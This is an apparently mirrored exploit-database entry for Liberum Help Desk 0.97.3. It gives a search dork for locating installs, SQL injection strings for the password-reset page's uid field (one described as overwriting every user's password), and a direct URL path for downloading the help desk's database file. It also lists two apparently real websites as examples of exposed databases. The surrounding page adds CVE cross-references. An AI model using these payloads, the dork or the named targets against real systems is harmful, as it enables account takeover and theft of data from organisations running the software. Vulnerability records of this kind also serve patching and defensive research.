Lucene search
Cold ZeroEDB-ID:7493HistoryDec 16, 2008 - 12:00 a.m.
Liberum Help Desk 0.97.3 - SQL Injection / File Disclosure
2008-12-1600:00:00
Cold Zero
www.exploit-db.com
26
AI Score
7.4
Confidence
Low
Liberum Help Desk (SQL/DD) Multiple Remote Vulnerabilities
author : Cold z3ro, www.hackteach.org
Dork : "Liberum Help Desk, Copyright (C) 2001 Doug Luxem"
==============
[#] SQL Injection
http://www.site.com/[path]/forgotpass.asp
In uid insert SQL command's =>
SCMD ==> ' or '1=1
SCMD ==> ' or 'update tblusers set password = "z3ro"
all passwords will be z3ro
=============
[#] Database Disclosure
http://www.site.com/[path]/db/helpdesk2000.mdb
example :
https://www.bauer.uh.edu/helpdesk/db/helpdesk2000.mdb
http://www.ags2.com/helpdesk/db/helpdesk2000.mdb
# milw0rm.com [2008-12-16]Related
cve
cve
CVE-2008-6057
2009-02-04 15:30:02
cvelist
cvelist
CVE-2008-6057
2009-02-04 15:10:00
nvd
nvd
CVE-2008-6057
2009-02-04 15:30:02
prion
prion
Improper access control
2009-02-04 15:30:00